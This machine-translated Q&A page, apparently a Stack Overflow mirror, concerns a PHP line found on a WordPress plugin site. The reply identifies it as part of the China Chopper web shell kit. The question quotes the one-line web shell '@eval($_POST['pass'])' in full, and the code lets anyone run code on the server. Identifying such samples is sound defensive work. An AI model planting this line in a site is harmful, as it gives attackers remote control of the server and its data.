在WordPress网站上找到<？php @eval($ _ POST ['pass']);？>代码

Jes*_*217 3 php passwords post eval

我在我的一个wordpress插件网站上找到了这段代码.我想它可以用于恶意,但究竟是什么,我能否知道它是否会调用我应该注意的其他一些行为？

这个PHP脚本属于China Chopper Hacking Kit.

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

归档时间：	10 年前
查看次数：	5999 次
最近记录：	9 年，10 月前

使用curl上传带有文件的POST数据 387

使用php发送json帖子 73

PHP mysql插入日期格式 56

内置支持PHP中的集合？ 48

用于匹配CSS十六进制颜色的正则表达式 32

configure:error:utf8_mime2text()有新签名,但缺少U8T_CANONICAL 32

面部识别/检测用于照片和视频库的PHP或软件 25

shell_exec()在"ls"上返回null 24

Emacs tramp模式编辑中的密码 16

错误:您需要立即更改密码(root强制执行) 2

检查shell脚本中是否存在目录 3556

何时在Java中使用LinkedList而不是ArrayList？ 2974

event.preventDefault()与return false 2891

检测未定义的对象属性 2742

如何检测元素外部的单击？ 2367

比较Git中的两个分支？ 2149

如何在Node.js中退出 1762

window.onload vs $(document).ready() 1205

UTF-8一路走来 1146

"正确"的JSON日期格式 1071